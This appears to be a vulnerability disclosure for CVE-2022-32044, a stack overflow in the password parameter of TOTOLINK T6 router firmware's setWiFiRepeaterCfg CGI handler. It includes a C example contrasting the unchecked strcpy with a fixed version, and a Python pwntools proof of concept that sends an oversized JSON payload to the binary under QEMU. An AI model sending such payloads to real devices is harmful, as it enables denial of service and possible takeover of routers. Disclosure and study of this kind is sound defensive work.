CVE-2022-32044: IoT-vuln/Totolink/T6-v2/5.setWiFiRepeaterCfg at main · d1tto/IoT-vuln
TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the password parameter in the function FUN_00413f80.
The vulnerability is in the router's web component, /web_cste/cgi-bin/cstecgi.cgi. The function FUN_00413f80 (at address 0x413f80) reads the JSON parameter password and, without checking its length, copies it directly into a fixed-size local variable on the stack, causing a stack overflow.
The program reads the JSON parameters encrypt, password and opmode. When encrypt equals WEP and opmode equals rpt, execution enters the branch at line 268 of the decompiled listing, which is where the unchecked copy of password takes place.
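To make the bug pattern concrete, the following is an added example and not the decompiled firmware code: a hypothetical reconstruction of the handler's shape, with the vulnerable strcpy-style copy beside a hardened version. The buffer size (64 bytes), the function names and the return codes are assumptions made for this example; the only facts taken from the page are the two gating conditions (encrypt == "WEP", opmode == "rpt") and the 0x400-byte password from the PoC.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the pattern described above (not the
 * decompiled firmware code): the handler copies the attacker-controlled
 * "password" JSON field into a fixed-size stack buffer. The buffer size,
 * function names and return codes are assumptions made for this example. */
#define PASSWORD_BUF 64

/* Vulnerable shape: once encrypt == "WEP" and opmode == "rpt", strcpy()
 * copies until the NUL terminator with no regard for the destination size,
 * so a 0x400-byte password overwrites the saved registers and return
 * address above local_password. Never call this with untrusted input. */
int set_repeater_cfg_vulnerable(const char *encrypt, const char *opmode,
                                const char *password)
{
    char local_password[PASSWORD_BUF];

    if (strcmp(encrypt, "WEP") != 0 || strcmp(opmode, "rpt") != 0)
        return -1;                      /* branch not taken */
    strcpy(local_password, password);   /* no length check: the bug */
    return (int)strlen(local_password);
}

/* Length scan that stops at the buffer size, so an unterminated or
 * oversized field can never be walked past the destination's capacity. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* A WEP key is 5 or 13 ASCII characters, or 10 or 26 hex digits, so the
 * protocol itself gives the field a natural upper bound. */
int wep_key_length_ok(size_t n)
{
    return n == 5 || n == 13 || n == 10 || n == 26;
}

/* Hardened shape: reject anything that does not fit (with its NUL) before
 * a single byte is copied, then validate the semantic length as well. */
int set_repeater_cfg_fixed(const char *encrypt, const char *opmode,
                           const char *password, char *out, size_t outsz)
{
    size_t n;

    if (strcmp(encrypt, "WEP") != 0 || strcmp(opmode, "rpt") != 0)
        return -1;                      /* branch not taken */
    n = bounded_len(password, outsz);
    if (n >= outsz)
        return -2;                      /* too long to fit with its NUL */
    if (!wep_key_length_ok(n))
        return -3;                      /* not a plausible WEP key */
    memcpy(out, password, n);
    out[n] = '\0';
    return (int)n;
}

int main(void)
{
    char key[PASSWORD_BUF];
    char payload[0x400 + 1];            /* same shape as the PoC's "A"*0x400 */

    memset(payload, 'A', 0x400);
    payload[0x400] = '\0';

    /* The PoC payload is rejected before any copy takes place. */
    printf("oversized payload -> %d\n",
           set_repeater_cfg_fixed("WEP", "rpt", payload, key, sizeof key));
    printf("13-char key -> %d\n",
           set_repeater_cfg_fixed("WEP", "rpt", "0123456789abc", key, sizeof key));
    return 0;
}
```

The point of the fixed version is that the length check happens on the untrusted input before the copy, with a bound derived from the destination rather than from the source; the WEP length check is an extra layer that also catches garbage that happens to be short enough.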
```python
from pwn import *
import json

# Request body for the setWiFiRepeaterCfg handler. encrypt=WEP and
# opmode=rpt reach the vulnerable branch; the 0x400-byte password
# overflows the stack buffer in FUN_00413f80.
data = {
    "topicurl": "setting/setWiFiRepeaterCfg",
    "opmode": "rpt",
    "encrypt": "WEP",
    "password": "A" * 0x400,
}
data = json.dumps(data)
print(data)

# Run the CGI binary under user-mode QEMU (little-endian MIPS) with the
# extracted firmware root as sysroot, waiting for a debugger on port 1234.
# CONTENT_LENGTH and REMOTE_ADDR mimic what the web server would set for
# a POST request.
argv = [
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecgi.cgi",
]

a = process(argv=argv)
a.sendline(data.encode())  # the CGI reads the body from stdin
a.interactive()
```